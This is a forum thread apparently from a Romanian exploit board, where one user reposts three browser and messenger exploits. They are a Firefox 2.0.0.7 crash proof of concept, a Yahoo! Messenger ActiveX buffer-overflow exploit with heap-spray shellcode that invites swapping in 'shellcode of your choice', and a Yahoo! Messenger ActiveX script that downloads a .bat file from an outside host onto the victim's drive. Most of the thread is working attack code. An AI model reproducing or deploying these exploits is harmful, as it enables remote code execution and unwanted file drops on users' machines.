Jump to content
puskin

YMess si Mozilla 2.X.X.X crasher exploit

By puskin, in Exploituri

Recommended Posts

puskin Newbie

puskin

Posted
Posted 

i#########################  #########################
#
#      AmnPardaz Security Research & Penetration Testing Group
#
# Bug Title: Mozilla Firefox 2.0.0.7 Denial of Service
# Vendor URL: [url]www.mozilla.org[/url]
# Version: <= 2.0.0.7
# Fix Available: Yes!
# Soloution: Update to 2.0.0.8
# Note: This bug works on 2.0.0.8 in different way. Although this bug doesn't crash 2.0.0.8, it causes not showing html code by viewing source in Mozilla Firefox 2.0.0.8 and this is another bug on 2.0.0.8!
# Proof: [url]http://www.astalavista.ir/proofs/MozillaFireFox/DoS1.htm[/url]
#
######################### [url]WwW.AmnPardaz.com[/url] ########################
#
# Leaders : Shahin Ramezany & Sorush Dalili
# Team Members: Amir Hossein Khonakdar, Hamid Farhadi
# Security Site: [url]WwW.BugReport.ir[/url] - [url]WwW.AmnPardaz.Com[/url]
# Country: Iran
# Greetz To : Astalavista.ir (Secuiran.com) Security Research Group, GrayHatz.net
# Contacts: <th3_vampire {4-t] yahoo [d-0-t} com> & <Irsdl {4-t] yahoo [d-0-t} com>
# 
######################## Bug Description ###########################
#
# To do this work we need 2 files (Html,XML).
# Their codes was written below.
#
# Save below codes in a HTML file.
#
--------------------------------------------------------------------
--------------------------------------------------------------------
<html>
	<head>
		<style>BODY{-moz-binding:url("moz.xml#xss")}</style>
	</head>
	<body>
		Suddenly see you baby! If you see this bug execution was failed!
		<script>
			alert('Soroush Dalili & Shahin Ramezani From Astalavista.ir')
		</script>
	</body>
</html>
--------------------------------------------------------------------
--------------------------------------------------------------------
#
# Save below codes in "moz.xml" file.
#
--------------------------------------------------------------------
--------------------------------------------------------------------
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
  <binding id="xss">
    <implementation>
      <constructor><![CDATA[
		eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%3e%27%29'));		
  	  ]]></constructor>
    </implementation>
  </binding>
</bindings>
--------------------------------------------------------------------
--------------------------------------------------------------------
#
# Now by runnig the HTML file by Mozilla FireFox <= 2.0.0.7 it will be crashed and by Mozilla FireFox 2.0.0.8 no code will be showed by viewing the source.
#
###################################################################


Link to comment
Share on other sites
puskin Newbie

puskin

Posted
  • Author
Posted

Yahoo! Messenger ywcupl.dll ActiveX Control send() Remote Buffer Overflow Exploit


<html>
<!--
45 minutes of fuzzing!
Great results! very relible, runs calc.exe, replace with shellcode of your choice!!!

link:[url]http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856[/url]
maybe more vulz!

Greetz to: str0ke and shinnai!
-->
<html>
<object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277' id='target'></object>
<script>
shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + 
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");    
bigblock = unescape("%u9090%u9090"); 
headersize = 20; 
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock; 
fillblock = bigblock.substring(0, slackspace); 
block = bigblock.substring(0, bigblock.length-slackspace); 
while(block.length+slackspace<0x40000) block = block+block+fillblock; 
memory = new Array(); 
for (x=0; x<800; x++) memory[x] = block + shellcode; 
var buffer = '\x0a'; 
while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a'; 
target.server = buffer; 
target.initialize(); 
target.send(); 
</script>
</html>

Link to comment
Share on other sites
puskin Newbie

puskin

Posted
  • Author
Posted

Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Download


<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body 
bgcolor="#E0E0E0">-----------------------------------------------------------------------------
 [b]Yahoo! Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download[/b]
 url: [url]http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe[/url]

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: [url]http://shinnai.altervista.org[/url]

 [b]<font color='red'>This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.</font>[/b]

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

 [b]Marked as:
 RegKey Safe for Script: False
 RegkeySafe for Init: False
 KillBitSet: False[/b]

 From remote: depends by Internet Explorer settings
 From local: yes

 [b]Description:
 This contron contains a "GetFile()" method which allows to download, on
 user's pc, an arbitrary file pased as argument.
 Remote execution depends by Internet Explorer settings, local execution
 works very well.[/b]

 [b]greetz to:<font color='red'> skyhole (or YAG KOHHA)</font> for inspiration[/b]
-----------------------------------------------------------------------------
<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
  Sub tryMe
   test.GetFile "http://www.shinnai.altervista.org/shinnai.bat","c:\\shinnai.bat",5,1,"shinnai"
   MsgBox "Exploit completed"
  End Sub
</script>
</span></span>
</code></pre>

Link to comment
Share on other sites
puskin Newbie

puskin

Posted
  • Author
Posted
cred ca ti-as strica toata distractia daca ti-as zice sa dai edit la post-ul tau de fiecare data cand vrei sa pui ceva aici , nu ?

edit : a se inlocui cuvantul distractia cu "progresul spre V.I.P" ( sau RIP )

sorry man....ma cam luat valul..data viitoare nu o sa mai fac galagie :P ,numai bine!

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...